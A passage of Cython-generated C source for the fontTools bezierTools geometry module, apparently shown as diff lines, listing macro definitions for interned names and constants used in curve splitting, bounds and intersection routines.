__pyx_n_s_alignment_transformation __pyx_mstate_global->__pyx_n_s_alignment_transformation -#define __pyx_n_s_all __pyx_mstate_global->__pyx_n_s_all -#define __pyx_n_s_angle __pyx_mstate_global->__pyx_n_s_angle -#define __pyx_n_s_append __pyx_mstate_global->__pyx_n_s_append -#define __pyx_n_s_approximateCubicArcLength __pyx_mstate_global->__pyx_n_s_approximateCubicArcLength -#define __pyx_n_u_approximateCubicArcLength __pyx_mstate_global->__pyx_n_u_approximateCubicArcLength -#define __pyx_n_s_approximateCubicArcLengthC __pyx_mstate_global->__pyx_n_s_approximateCubicArcLengthC -#define __pyx_n_u_approximateCubicArcLengthC __pyx_mstate_global->__pyx_n_u_approximateCubicArcLengthC -#define __pyx_kp_u_approximateCubicArcLength_line_3 __pyx_mstate_global->__pyx_kp_u_approximateCubicArcLength_line_3 -#define __pyx_n_s_approximateQuadraticArcLength __pyx_mstate_global->__pyx_n_s_approximateQuadraticArcLength -#define __pyx_n_u_approximateQuadraticArcLength __pyx_mstate_global->__pyx_n_u_approximateQuadraticArcLength -#define __pyx_n_s_approximateQuadraticArcLengthC __pyx_mstate_global->__pyx_n_s_approximateQuadraticArcLengthC -#define __pyx_n_u_approximateQuadraticArcLengthC __pyx_mstate_global->__pyx_n_u_approximateQuadraticArcLengthC -#define __pyx_n_s_arch __pyx_mstate_global->__pyx_n_s_arch -#define __pyx_n_s_args __pyx_mstate_global->__pyx_n_s_args -#define __pyx_n_s_asinh __pyx_mstate_global->__pyx_n_s_asinh -#define __pyx_n_s_asyncio_coroutines __pyx_mstate_global->__pyx_n_s_asyncio_coroutines -#define __pyx_n_s_atan2 __pyx_mstate_global->__pyx_n_s_atan2 -#define __pyx_n_s_ax __pyx_mstate_global->__pyx_n_s_ax -#define __pyx_n_s_ax2 __pyx_mstate_global->__pyx_n_s_ax2 -#define __pyx_n_s_ax3 __pyx_mstate_global->__pyx_n_s_ax3 -#define __pyx_n_s_ay __pyx_mstate_global->__pyx_n_s_ay -#define __pyx_n_s_ay2 __pyx_mstate_global->__pyx_n_s_ay2 -#define __pyx_n_s_ay3 __pyx_mstate_global->__pyx_n_s_ay3 -#define __pyx_n_s_b __pyx_mstate_global->__pyx_n_s_b -#define __pyx_n_s_b1 __pyx_mstate_global->__pyx_n_s_b1 -#define __pyx_n_s_b1x __pyx_mstate_global->__pyx_n_s_b1x -#define __pyx_n_s_b1y __pyx_mstate_global->__pyx_n_s_b1y -#define __pyx_n_s_both_points_are_on_same_side_of __pyx_mstate_global->__pyx_n_s_both_points_are_on_same_side_of -#define __pyx_n_s_bounds1 __pyx_mstate_global->__pyx_n_s_bounds1 -#define __pyx_n_s_bounds2 __pyx_mstate_global->__pyx_n_s_bounds2 -#define __pyx_n_s_box __pyx_mstate_global->__pyx_n_s_box -#define __pyx_n_s_bx __pyx_mstate_global->__pyx_n_s_bx -#define __pyx_n_s_bx2 __pyx_mstate_global->__pyx_n_s_bx2 -#define __pyx_n_s_by __pyx_mstate_global->__pyx_n_s_by -#define __pyx_n_s_by2 __pyx_mstate_global->__pyx_n_s_by2 -#define __pyx_n_s_c __pyx_mstate_global->__pyx_n_s_c -#define __pyx_n_s_c1 __pyx_mstate_global->__pyx_n_s_c1 -#define __pyx_n_s_c11 __pyx_mstate_global->__pyx_n_s_c11 -#define __pyx_n_s_c11_range __pyx_mstate_global->__pyx_n_s_c11_range -#define __pyx_n_s_c12 __pyx_mstate_global->__pyx_n_s_c12 -#define __pyx_n_s_c12_range __pyx_mstate_global->__pyx_n_s_c12_range -#define __pyx_n_s_c1x __pyx_mstate_global->__pyx_n_s_c1x -#define __pyx_n_s_c1y __pyx_mstate_global->__pyx_n_s_c1y -#define __pyx_n_s_c21 __pyx_mstate_global->__pyx_n_s_c21 -#define __pyx_n_s_c21_range __pyx_mstate_global->__pyx_n_s_c21_range -#define __pyx_n_s_c22 __pyx_mstate_global->__pyx_n_s_c22 -#define __pyx_n_s_c22_range __pyx_mstate_global->__pyx_n_s_c22_range -#define __pyx_n_s_calcBounds __pyx_mstate_global->__pyx_n_s_calcBounds -#define __pyx_n_s_calcCubicArcLength __pyx_mstate_global->__pyx_n_s_calcCubicArcLength -#define __pyx_n_u_calcCubicArcLength __pyx_mstate_global->__pyx_n_u_calcCubicArcLength -#define __pyx_n_s_calcCubicArcLengthC __pyx_mstate_global->__pyx_n_s_calcCubicArcLengthC -#define __pyx_n_u_calcCubicArcLengthC __pyx_mstate_global->__pyx_n_u_calcCubicArcLengthC -#define __pyx_n_s_calcCubicArcLengthCRecurse __pyx_mstate_global->__pyx_n_s_calcCubicArcLengthCRecurse -#define __pyx_n_s_calcCubicBounds __pyx_mstate_global->__pyx_n_s_calcCubicBounds -#define __pyx_n_u_calcCubicBounds __pyx_mstate_global->__pyx_n_u_calcCubicBounds -#define __pyx_kp_u_calcCubicBounds_line_412 __pyx_mstate_global->__pyx_kp_u_calcCubicBounds_line_412 -#define __pyx_n_s_calcCubicParameters __pyx_mstate_global->__pyx_n_s_calcCubicParameters -#define __pyx_n_s_calcCubicPoints __pyx_mstate_global->__pyx_n_s_calcCubicPoints -#define __pyx_n_s_calcQuadraticArcLength __pyx_mstate_global->__pyx_n_s_calcQuadraticArcLength -#define __pyx_n_u_calcQuadraticArcLength __pyx_mstate_global->__pyx_n_u_calcQuadraticArcLength -#define __pyx_n_s_calcQuadraticArcLengthC __pyx_mstate_global->__pyx_n_s_calcQuadraticArcLengthC -#define __pyx_n_u_calcQuadraticArcLengthC __pyx_mstate_global->__pyx_n_u_calcQuadraticArcLengthC -#define __pyx_kp_u_calcQuadraticArcLength_line_151 __pyx_mstate_global->__pyx_kp_u_calcQuadraticArcLength_line_151 -#define __pyx_n_s_calcQuadraticBounds __pyx_mstate_global->__pyx_n_s_calcQuadraticBounds -#define __pyx_n_u_calcQuadraticBounds __pyx_mstate_global->__pyx_n_u_calcQuadraticBounds -#define __pyx_kp_u_calcQuadraticBounds_line_298 __pyx_mstate_global->__pyx_kp_u_calcQuadraticBounds_line_298 -#define __pyx_n_s_calcQuadraticParameters __pyx_mstate_global->__pyx_n_s_calcQuadraticParameters -#define __pyx_n_s_calcQuadraticPoints __pyx_mstate_global->__pyx_n_s_calcQuadraticPoints -#define __pyx_n_s_class_getitem __pyx_mstate_global->__pyx_n_s_class_getitem -#define __pyx_n_s_cline_in_traceback __pyx_mstate_global->__pyx_n_s_cline_in_traceback -#define __pyx_n_s_close __pyx_mstate_global->__pyx_n_s_close -#define __pyx_n_s_collections __pyx_mstate_global->__pyx_n_s_collections -#define __pyx_n_s_cos __pyx_mstate_global->__pyx_n_s_cos -#define __pyx_n_s_cubicPointAtT __pyx_mstate_global->__pyx_n_s_cubicPointAtT -#define __pyx_n_u_cubicPointAtT __pyx_mstate_global->__pyx_n_u_cubicPointAtT -#define __pyx_n_s_cubicPointAtTC __pyx_mstate_global->__pyx_n_s_cubicPointAtTC -#define __pyx_n_u_cubicPointAtTC __pyx_mstate_global->__pyx_n_u_cubicPointAtTC -#define __pyx_n_s_curve __pyx_mstate_global->__pyx_n_s_curve -#define __pyx_n_s_curve1 __pyx_mstate_global->__pyx_n_s_curve1 -#define __pyx_n_s_curve2 __pyx_mstate_global->__pyx_n_s_curve2 -#define __pyx_n_s_curveCurveIntersections __pyx_mstate_global->__pyx_n_s_curveCurveIntersections -#define __pyx_n_u_curveCurveIntersections __pyx_mstate_global->__pyx_n_u_curveCurveIntersections -#define __pyx_kp_u_curveCurveIntersections_line_137 __pyx_mstate_global->__pyx_kp_u_curveCurveIntersections_line_137 -#define __pyx_n_s_curveLineIntersections __pyx_mstate_global->__pyx_n_s_curveLineIntersections -#define __pyx_n_u_curveLineIntersections __pyx_mstate_global->__pyx_n_u_curveLineIntersections -#define __pyx_kp_u_curveLineIntersections_line_1248 __pyx_mstate_global->__pyx_kp_u_curveLineIntersections_line_1248 -#define __pyx_n_s_curve_bounds __pyx_mstate_global->__pyx_n_s_curve_bounds -#define __pyx_n_s_curve_curve_intersections_t __pyx_mstate_global->__pyx_n_s_curve_curve_intersections_t -#define __pyx_n_s_curve_curve_intersections_t_loc __pyx_mstate_global->__pyx_n_s_curve_curve_intersections_t_loc -#define __pyx_n_s_curve_curve_intersections_t_loc_2 __pyx_mstate_global->__pyx_n_s_curve_curve_intersections_t_loc_2 -#define __pyx_n_s_curve_line_intersections_t __pyx_mstate_global->__pyx_n_s_curve_line_intersections_t -#define __pyx_n_s_curve_line_intersections_t_loca __pyx_mstate_global->__pyx_n_s_curve_line_intersections_t_loca -#define __pyx_n_s_cx __pyx_mstate_global->__pyx_n_s_cx -#define __pyx_n_s_cy __pyx_mstate_global->__pyx_n_s_cy -#define __pyx_n_s_cython __pyx_mstate_global->__pyx_n_s_cython -#define __pyx_n_s_d __pyx_mstate_global->__pyx_n_s_d -#define __pyx_n_s_d0 __pyx_mstate_global->__pyx_n_s_d0 -#define __pyx_n_s_d1 __pyx_mstate_global->__pyx_n_s_d1 -#define __pyx_n_s_d1x __pyx_mstate_global->__pyx_n_s_d1x -#define __pyx_n_s_d1y __pyx_mstate_global->__pyx_n_s_d1y -#define __pyx_n_s_delta __pyx_mstate_global->__pyx_n_s_delta -#define __pyx_n_s_delta_2 __pyx_mstate_global->__pyx_n_s_delta_2 -#define __pyx_n_s_delta_3 __pyx_mstate_global->__pyx_n_s_delta_3 -#define __pyx_n_s_deriv3 __pyx_mstate_global->__pyx_n_s_deriv3 -#define __pyx_kp_u_disable __pyx_mstate_global->__pyx_kp_u_disable -#define __pyx_n_s_doctest __pyx_mstate_global->__pyx_n_s_doctest -#define __pyx_n_s_dx __pyx_mstate_global->__pyx_n_s_dx -#define __pyx_n_s_dy __pyx_mstate_global->__pyx_n_s_dy -#define __pyx_n_s_e __pyx_mstate_global->__pyx_n_s_e -#define __pyx_n_s_e1 __pyx_mstate_global->__pyx_n_s_e1 -#define __pyx_n_s_e1x __pyx_mstate_global->__pyx_n_s_e1x -#define __pyx_n_s_e1y __pyx_mstate_global->__pyx_n_s_e1y -#define __pyx_n_s_e2 __pyx_mstate_global->__pyx_n_s_e2 -#define __pyx_n_s_e2x __pyx_mstate_global->__pyx_n_s_e2x -#define __pyx_n_s_e2y __pyx_mstate_global->__pyx_n_s_e2y -#define __pyx_kp_u_enable __pyx_mstate_global->__pyx_kp_u_enable -#define __pyx_n_s_end __pyx_mstate_global->__pyx_n_s_end -#define __pyx_n_s_epsilon __pyx_mstate_global->__pyx_n_s_epsilon -#define __pyx_n_s_epsilonDigits __pyx_mstate_global->__pyx_n_s_epsilonDigits -#define __pyx_n_s_ex __pyx_mstate_global->__pyx_n_s_ex -#define __pyx_n_s_exit __pyx_mstate_global->__pyx_n_s_exit -#define __pyx_n_s_ey __pyx_mstate_global->__pyx_n_s_ey -#define __pyx_n_s_failed __pyx_mstate_global->__pyx_n_s_failed -#define __pyx_n_s_fontTools_misc __pyx_mstate_global->__pyx_n_s_fontTools_misc -#define __pyx_n_s_fontTools_misc_arrayTools __pyx_mstate_global->__pyx_n_s_fontTools_misc_arrayTools -#define __pyx_n_s_fontTools_misc_bezierTools __pyx_mstate_global->__pyx_n_s_fontTools_misc_bezierTools -#define __pyx_n_s_fontTools_misc_transform __pyx_mstate_global->__pyx_n_s_fontTools_misc_transform -#define __pyx_n_s_found __pyx_mstate_global->__pyx_n_s_found -#define __pyx_kp_u_g __pyx_mstate_global->__pyx_kp_u_g -#define __pyx_kp_u_gc __pyx_mstate_global->__pyx_kp_u_gc -#define __pyx_n_s_genexpr __pyx_mstate_global->__pyx_n_s_genexpr -#define __pyx_n_s_i __pyx_mstate_global->__pyx_n_s_i -#define __pyx_n_s_import __pyx_mstate_global->__pyx_n_s_import -#define __pyx_n_s_initializing __pyx_mstate_global->__pyx_n_s_initializing -#define __pyx_n_s_insert __pyx_mstate_global->__pyx_n_s_insert -#define __pyx_n_s_intersection_ts __pyx_mstate_global->__pyx_n_s_intersection_ts -#define __pyx_n_s_intersections __pyx_mstate_global->__pyx_n_s_intersections -#define __pyx_n_s_intersects __pyx_mstate_global->__pyx_n_s_intersects -#define __pyx_n_s_isHorizontal __pyx_mstate_global->__pyx_n_s_isHorizontal -#define __pyx_n_s_is_coroutine __pyx_mstate_global->__pyx_n_s_is_coroutine -#define __pyx_n_s_isclose __pyx_mstate_global->__pyx_n_s_isclose -#define __pyx_kp_u_isenabled __pyx_mstate_global->__pyx_kp_u_isenabled -#define __pyx_n_s_it __pyx_mstate_global->__pyx_n_s_it -#define __pyx_n_s_key __pyx_mstate_global->__pyx_n_s_key -#define __pyx_n_s_line __pyx_mstate_global->__pyx_n_s_line -#define __pyx_n_s_lineLineIntersections __pyx_mstate_global->__pyx_n_s_lineLineIntersections -#define __pyx_n_u_lineLineIntersections __pyx_mstate_global->__pyx_n_u_lineLineIntersections -#define __pyx_kp_u_lineLineIntersections_line_1147 __pyx_mstate_global->__pyx_kp_u_lineLineIntersections_line_1147 -#define __pyx_n_s_linePointAtT __pyx_mstate_global->__pyx_n_s_linePointAtT -#define __pyx_n_u_linePointAtT __pyx_mstate_global->__pyx_n_u_linePointAtT -#define __pyx_n_s_line_t __pyx_mstate_global->__pyx_n_s_line_t -#define __pyx_n_s_line_t_of_pt __pyx_mstate_global->__pyx_n_s_line_t_of_pt -#define __pyx_n_s_main __pyx_mstate_global->__pyx_n_s_main -#define __pyx_n_u_main __pyx_mstate_global->__pyx_n_u_main -#define __pyx_n_s_math __pyx_mstate_global->__pyx_n_s_math -#define __pyx_n_s_mid __pyx_mstate_global->__pyx_n_s_mid -#define __pyx_n_s_midPt __pyx_mstate_global->__pyx_n_s_midPt -#define __pyx_n_s_midpoint __pyx_mstate_global->__pyx_n_s_midpoint -#define __pyx_n_s_mult __pyx_mstate_global->__pyx_n_s_mult -#define __pyx_n_s_n __pyx_mstate_global->__pyx_n_s_n -#define __pyx_n_s_name __pyx_mstate_global->__pyx_n_s_name -#define __pyx_n_s_namedtuple __pyx_mstate_global->__pyx_n_s_namedtuple -#define __pyx_n_s_obj __pyx_mstate_global->__pyx_n_s_obj -#define __pyx_n_s_off1 __pyx_mstate_global->__pyx_n_s_off1 -#define __pyx_n_s_off2 __pyx_mstate_global->__pyx_n_s_off2 -#define __pyx_n_s_one __pyx_mstate_global->__pyx_n_s_one -#define __pyx_n_s_origDist __pyx_mstate_global->__pyx_n_s_origDist -#define __pyx_n_s_origin __pyx_mstate_global->__pyx_n_s_origin -#define __pyx_n_s_p0 __pyx_mstate_global->__pyx_n_s_p0 -#define __pyx_n_s_p1 __pyx_mstate_global->__pyx_n_s_p1 -#define __pyx_n_s_p2 __pyx_mstate_global->__pyx_n_s_p2 -#define __pyx_n_s_p3 __pyx_mstate_global->__pyx_n_s_p3 -#define __pyx_n_s_pi __pyx_mstate_global->__pyx_n_s_pi -#define __pyx_n_s_pointAtT __pyx_mstate_global->__pyx_n_s_pointAtT -#define __pyx_n_s_pointFinder __pyx_mstate_global->__pyx_n_s_pointFinder -#define __pyx_n_s_points __pyx_mstate_global->__pyx_n_s_points -#define __pyx_n_s_precision __pyx_mstate_global->__pyx_n_s_precision -#define __pyx_n_s_print __pyx_mstate_global->__pyx_n_s_print -#define __pyx_n_s_printSegments __pyx_mstate_global->__pyx_n_s_printSegments -#define __pyx_n_s_pt __pyx_mstate_global->__pyx_n_s_pt -#define __pyx_n_u_pt __pyx_mstate_global->__pyx_n_u_pt -#define __pyx_n_s_pt1 __pyx_mstate_global->__pyx_n_s_pt1 -#define __pyx_n_s_pt1x __pyx_mstate_global->__pyx_n_s_pt1x -#define __pyx_n_s_pt1y __pyx_mstate_global->__pyx_n_s_pt1y -#define __pyx_n_s_pt2 __pyx_mstate_global->__pyx_n_s_pt2 -#define __pyx_n_s_pt2x __pyx_mstate_global->__pyx_n_s_pt2x -#define __pyx_n_s_pt2y __pyx_mstate_global->__pyx_n_s_pt2y -#define __pyx_n_s_pt3 __pyx_mstate_global->__pyx_n_s_pt3 -#define __pyx_n_s_pt4 __pyx_mstate_global->__pyx_n_s_pt4 -#define __pyx_n_s_px __pyx_mstate_global->__pyx_n_s_px -#define __pyx_n_s_py __pyx_mstate_global->__pyx_n_s_py -#define __pyx_n_s_quadraticPointAtT __pyx_mstate_global->__pyx_n_s_quadraticPointAtT -#define __pyx_n_u_quadraticPointAtT __pyx_mstate_global->__pyx_n_u_quadraticPointAtT -#define __pyx_n_s_r __pyx_mstate_global->__pyx_n_s_r -#define __pyx_n_s_rDD __pyx_mstate_global->__pyx_n_s_rDD -#define __pyx_n_s_rQ2 __pyx_mstate_global->__pyx_n_s_rQ2 -#define __pyx_n_s_range __pyx_mstate_global->__pyx_n_s_range -#define __pyx_n_s_range1 __pyx_mstate_global->__pyx_n_s_range1 -#define __pyx_n_s_range2 __pyx_mstate_global->__pyx_n_s_range2 -#define __pyx_n_s_rectArea __pyx_mstate_global->__pyx_n_s_rectArea -#define __pyx_n_s_roots __pyx_mstate_global->__pyx_n_s_roots -#define __pyx_n_s_rotate __pyx_mstate_global->__pyx_n_s_rotate -#define __pyx_n_s_round __pyx_mstate_global->__pyx_n_s_round -#define __pyx_n_s_s __pyx_mstate_global->__pyx_n_s_s -#define __pyx_n_s_s1 __pyx_mstate_global->__pyx_n_s_s1 -#define __pyx_n_s_s1x __pyx_mstate_global->__pyx_n_s_s1x -#define __pyx_n_s_s1y __pyx_mstate_global->__pyx_n_s_s1y -#define __pyx_n_s_s2 __pyx_mstate_global->__pyx_n_s_s2 -#define __pyx_n_s_s2x __pyx_mstate_global->__pyx_n_s_s2x -#define __pyx_n_s_s2y __pyx_mstate_global->__pyx_n_s_s2y -#define __pyx_kp_u_s_2 __pyx_mstate_global->__pyx_kp_u_s_2 -#define __pyx_n_s_scale __pyx_mstate_global->__pyx_n_s_scale -#define __pyx_n_s_sectRect __pyx_mstate_global->__pyx_n_s_sectRect -#define __pyx_n_s_seen __pyx_mstate_global->__pyx_n_s_seen -#define __pyx_n_s_seg __pyx_mstate_global->__pyx_n_s_seg -#define __pyx_n_s_seg1 __pyx_mstate_global->__pyx_n_s_seg1 -#define __pyx_n_s_seg2 __pyx_mstate_global->__pyx_n_s_seg2 -#define __pyx_n_s_segment __pyx_mstate_global->__pyx_n_s_segment -#define __pyx_n_s_segmentPointAtT __pyx_mstate_global->__pyx_n_s_segmentPointAtT -#define __pyx_n_u_segmentPointAtT __pyx_mstate_global->__pyx_n_u_segmentPointAtT -#define __pyx_n_s_segmentSegmentIntersections __pyx_mstate_global->__pyx_n_s_segmentSegmentIntersections -#define __pyx_n_u_segmentSegmentIntersections __pyx_mstate_global->__pyx_n_u_segmentSegmentIntersections -#define __pyx_kp_u_segmentSegmentIntersections_line __pyx_mstate_global->__pyx_kp_u_segmentSegmentIntersections_line -#define __pyx_n_s_segmentrepr __pyx_mstate_global->__pyx_n_s_segmentrepr -#define __pyx_kp_u_segmentrepr_1_2_3_2_3_4_0_1_2 __pyx_mstate_global->__pyx_kp_u_segmentrepr_1_2_3_2_3_4_0_1_2 -#define __pyx_kp_u_segmentrepr_line_1449 __pyx_mstate_global->__pyx_kp_u_segmentrepr_line_1449 -#define __pyx_n_s_segmentrepr_locals_genexpr __pyx_mstate_global->__pyx_n_s_segmentrepr_locals_genexpr -#define __pyx_n_s_segments __pyx_mstate_global->__pyx_n_s_segments -#define __pyx_n_s_send __pyx_mstate_global->__pyx_n_s_send -#define __pyx_n_s_slope12 __pyx_mstate_global->__pyx_n_s_slope12 -#define __pyx_n_s_slope34 __pyx_mstate_global->__pyx_n_s_slope34 -#define __pyx_n_s_solutions __pyx_mstate_global->__pyx_n_s_solutions -#define __pyx_n_s_solveCubic __pyx_mstate_global->__pyx_n_s_solveCubic -#define __pyx_n_u_solveCubic __pyx_mstate_global->__pyx_n_u_solveCubic -#define __pyx_kp_u_solveCubic_line_841 __pyx_mstate_global->__pyx_kp_u_solveCubic_line_841 -#define __pyx_n_s_solveQuadratic __pyx_mstate_global->__pyx_n_s_solveQuadratic -#define __pyx_n_u_solveQuadratic __pyx_mstate_global->__pyx_n_u_solveQuadratic -#define __pyx_n_s_spec __pyx_mstate_global->__pyx_n_s_spec -#define __pyx_n_s_splitCubic __pyx_mstate_global->__pyx_n_s_splitCubic -#define __pyx_n_u_splitCubic __pyx_mstate_global->__pyx_n_u_splitCubic -#define __pyx_n_s_splitCubicAtT __pyx_mstate_global->__pyx_n_s_splitCubicAtT -#define __pyx_n_s_splitCubicAtTC __pyx_mstate_global->__pyx_n_s_splitCubicAtTC -#define __pyx_n_u_splitCubicAtTC __pyx_mstate_global->__pyx_n_u_splitCubicAtTC -#define __pyx_n_s_splitCubicAtTC_2 __pyx_mstate_global->__pyx_n_s_splitCubicAtTC_2 -#define __pyx_n_s_splitCubicAtT_2 __pyx_mstate_global->__pyx_n_s_splitCubicAtT_2 -#define __pyx_n_u_splitCubicAtT_2 __pyx_mstate_global->__pyx_n_u_splitCubicAtT_2 -#define __pyx_kp_u_splitCubicAtT_line_613 __pyx_mstate_global->__pyx_kp_u_splitCubicAtT_line_613 -#define __pyx_n_s_splitCubicIntoTwoAtTC __pyx_mstate_global->__pyx_n_s_splitCubicIntoTwoAtTC -#define __pyx_n_u_splitCubicIntoTwoAtTC __pyx_mstate_global->__pyx_n_u_splitCubicIntoTwoAtTC -#define __pyx_kp_u_splitCubic_line_552 __pyx_mstate_global->__pyx_kp_u_splitCubic_line_552 -#define __pyx_n_s_splitCubic_locals_genexpr __pyx_mstate_global->__pyx_n_s_splitCubic_locals_genexpr -#define __pyx_n_s_splitLine __pyx_mstate_global->__pyx_n_s_splitLine -#define __pyx_n_u_splitLine __pyx_mstate_global->__pyx_n_u_splitLine -#define __pyx_kp_u_splitLine_line_450 __pyx_mstate_global->__pyx_kp_u_splitLine_line_450 -#define __pyx_n_s_splitQuadratic __pyx_mstate_global->__pyx_n_s_splitQuadratic -#define __pyx_n_u_splitQuadratic __pyx_mstate_global->__pyx_n_u_splitQuadratic -#define __pyx_n_s_splitQuadraticAtT __pyx_mstate_global->__pyx_n_s_splitQuadraticAtT -#define __pyx_n_s_splitQuadraticAtT_2 __pyx_mstate_global->__pyx_n_s_splitQuadraticAtT_2 -#define __pyx_n_u_splitQuadraticAtT_2 __pyx_mstate_global->__pyx_n_u_splitQuadraticAtT_2 -#define __pyx_kp_u_splitQuadraticAtT_line_589 __pyx_mstate_global->__pyx_kp_u_splitQuadraticAtT_line_589 -#define __pyx_kp_u_splitQuadratic_line_507 __pyx_mstate_global->__pyx_kp_u_splitQuadratic_line_507 -#define __pyx_n_s_splitQuadratic_locals_genexpr __pyx_mstate_global->__pyx_n_s_splitQuadratic_locals_genexpr -#define __pyx_n_s_split_cubic_into_two __pyx_mstate_global->__pyx_n_s_split_cubic_into_two -#define __pyx_n_s_split_segment_at_t __pyx_mstate_global->__pyx_n_s_split_segment_at_t -#define __pyx_n_s_sqrt __pyx_mstate_global->__pyx_n_s_sqrt -#define __pyx_n_s_start __pyx_mstate_global->__pyx_n_s_start -#define __pyx_n_s_swapped __pyx_mstate_global->__pyx_n_s_swapped -#define __pyx_n_s_sx __pyx_mstate_global->__pyx_n_s_sx -#define __pyx_n_s_sy __pyx_mstate_global->__pyx_n_s_sy -#define __pyx_n_s_sys __pyx_mstate_global->__pyx_n_s_sys -#define __pyx_n_s_t __pyx_mstate_global->__pyx_n_s_t -#define __pyx_n_s_t1 __pyx_mstate_global->__pyx_n_s_t1 -#define __pyx_n_u_t1 __pyx_mstate_global->__pyx_n_u_t1 -#define __pyx_n_s_t1_2 __pyx_mstate_global->__pyx_n_s_t1_2 -#define __pyx_n_s_t1_3 __pyx_mstate_global->__pyx_n_s_t1_3 -#define __pyx_n_s_t2 __pyx_mstate_global->__pyx_n_s_t2 -#define __pyx_n_u_t2 __pyx_mstate_global->__pyx_n_u_t2 -#define __pyx_n_s_test __pyx_mstate_global->__pyx_n_s_test -#define __pyx_n_s_testmod __pyx_mstate_global->__pyx_n_s_testmod -#define __pyx_n_s_theta __pyx_mstate_global->__pyx_n_s_theta -#define __pyx_n_s_throw __pyx_mstate_global->__pyx_n_s_throw -#define __pyx_n_s_tolerance __pyx_mstate_global->__pyx_n_s_tolerance -#define __pyx_n_s_transformPoints __pyx_mstate_global->__pyx_n_s_transformPoints -#define __pyx_n_s_translate __pyx_mstate_global->__pyx_n_s_translate -#define __pyx_n_s_ts __pyx_mstate_global->__pyx_n_s_ts -#define __pyx_n_s_two __pyx_mstate_global->__pyx_n_s_two -#define __pyx_n_s_unique_key __pyx_mstate_global->__pyx_n_s_unique_key -#define __pyx_n_s_unique_values __pyx_mstate_global->__pyx_n_s_unique_values -#define __pyx_n_s_v0 __pyx_mstate_global->__pyx_n_s_v0 -#define __pyx_n_s_v1 __pyx_mstate_global->__pyx_n_s_v1 -#define __pyx_n_s_v2 __pyx_mstate_global->__pyx_n_s_v2 -#define __pyx_n_s_v3 __pyx_mstate_global->__pyx_n_s_v3 -#define __pyx_n_s_v4 __pyx_mstate_global->__pyx_n_s_v4 -#define __pyx_n_s_where __pyx_mstate_global->__pyx_n_s_where -#define __pyx_n_s_x __pyx_mstate_global->__pyx_n_s_x -#define __pyx_n_s_x0 __pyx_mstate_global->__pyx_n_s_x0 -#define __pyx_n_s_x1 __pyx_mstate_global->__pyx_n_s_x1 -#define __pyx_n_s_x2 __pyx_mstate_global->__pyx_n_s_x2 -#define __pyx_n_s_x3 __pyx_mstate_global->__pyx_n_s_x3 -#define __pyx_n_s_x4 __pyx_mstate_global->__pyx_n_s_x4 -#define __pyx_n_s_xDiff __pyx_mstate_global->__pyx_n_s_xDiff -#define __pyx_n_s_xRoots __pyx_mstate_global->__pyx_n_s_xRoots -#define __pyx_n_s_y __pyx_mstate_global->__pyx_n_s_y -#define __pyx_n_s_y1 __pyx_mstate_global->__pyx_n_s_y1 -#define __pyx_n_s_y2 __pyx_mstate_global->__pyx_n_s_y2 -#define __pyx_n_s_y3 __pyx_mstate_global->__pyx_n_s_y3 -#define __pyx_n_s_y4 __pyx_mstate_global->__pyx_n_s_y4 -#define __pyx_n_s_yDiff __pyx_mstate_global->__pyx_n_s_yDiff -#define __pyx_n_s_yRoots __pyx_mstate_global->__pyx_n_s_yRoots -#define __pyx_float_0_0 __pyx_mstate_global->__pyx_float_0_0 -#define __pyx_float_0_5 __pyx_mstate_global->__pyx_float_0_5 -#define __pyx_float_1_0 __pyx_mstate_global->__pyx_float_1_0 -#define __pyx_float_2_0 __pyx_mstate_global->__pyx_float_2_0 -#define __pyx_float_3_0 __pyx_mstate_global->__pyx_float_3_0 -#define __pyx_float_4_0 __pyx_mstate_global->__pyx_float_4_0 -#define __pyx_float_9_0 __pyx_mstate_global->__pyx_float_9_0 -#define __pyx_float_1eneg_3 __pyx_mstate_global->__pyx_float_1eneg_3 -#define __pyx_float_27_0 __pyx_mstate_global->__pyx_float_27_0 -#define __pyx_float_54_0 __pyx_mstate_global->__pyx_float_54_0 -#define __pyx_float_0_005 __pyx_mstate_global->__pyx_float_0_005 -#define __pyx_float_0_125 __pyx_mstate_global->__pyx_float_0_125 -#define __pyx_float_1eneg_10 __pyx_mstate_global->__pyx_float_1eneg_10 -#define __pyx_float_neg_2_0 __pyx_mstate_global->__pyx_float_neg_2_0 -#define __pyx_int_0 __pyx_mstate_global->__pyx_int_0 -#define __pyx_int_1 __pyx_mstate_global->__pyx_int_1 -#define __pyx_int_2 __pyx_mstate_global->__pyx_int_2 -#define __pyx_int_3 __pyx_mstate_global->__pyx_int_3 -#define __pyx_int_6 __pyx_mstate_global->__pyx_int_6 -#define __pyx_int_neg_1 __pyx_mstate_global->__pyx_int_neg_1 -#define __pyx_codeobj_ __pyx_mstate_global->__pyx_codeobj_ -#define __pyx_tuple__2 __pyx_mstate_global->__pyx_tuple__2 -#define __pyx_tuple__4 __pyx_mstate_global->__pyx_tuple__4 -#define __pyx_tuple__5 __pyx_mstate_global->__pyx_tuple__5 -#define __pyx_tuple__6 __pyx_mstate_global->__pyx_tuple__6 -#define __pyx_tuple__8 __pyx_mstate_global->__pyx_tuple__8 -#define __pyx_tuple__12 __pyx_mstate_global->__pyx_tuple__12 -#define __pyx_tuple__14 __pyx_mstate_global->__pyx_tuple__14 -#define __pyx_tuple__15 __pyx_mstate_global->__pyx_tuple__15 -#define __pyx_tuple__17 __pyx_mstate_global->__pyx_tuple__17 -#define __pyx_tuple__19 __pyx_mstate_global->__pyx_tuple__19 -#define __pyx_tuple__21 __pyx_mstate_global->__pyx_tuple__21 -#define __pyx_tuple__23 __pyx_mstate_global->__pyx_tuple__23 -#define __pyx_tuple__26 __pyx_mstate_global->__pyx_tuple__26 -#define __pyx_tuple__28 __pyx_mstate_global->__pyx_tuple__28 -#define __pyx_tuple__30 __pyx_mstate_global->__pyx_tuple__30 -#define __pyx_tuple__32 __pyx_mstate_global->__pyx_tuple__32 -#define __pyx_tuple__34 __pyx_mstate_global->__pyx_tuple__34 -#define __pyx_tuple__36 __pyx_mstate_global->__pyx_tuple__36 -#define __pyx_tuple__38 __pyx_mstate_global->__pyx_tuple__38 -#define __pyx_tuple__40 __pyx_mstate_global->__pyx_tuple__40 -#define __pyx_tuple__42 __pyx_mstate_global->__pyx_tuple__42 -#define __pyx_tuple__44 __pyx_mstate_global->__pyx_tuple__44 -#define __pyx_tuple__46 __pyx_mstate_global->__pyx_tuple__46 -#define __pyx_tuple__48 __pyx_mstate_global->__pyx_tuple__48 -#define __pyx_tuple__50 __pyx_mstate_global->__pyx_tuple__50 -#define __pyx_tuple__52 __pyx_mstate_global->__pyx_tuple__52 -#define __pyx_tuple__53 __pyx_mstate_global->__pyx_tuple__53 -#define __pyx_tuple__55 __pyx_mstate_global->__pyx_tuple__55 -#define 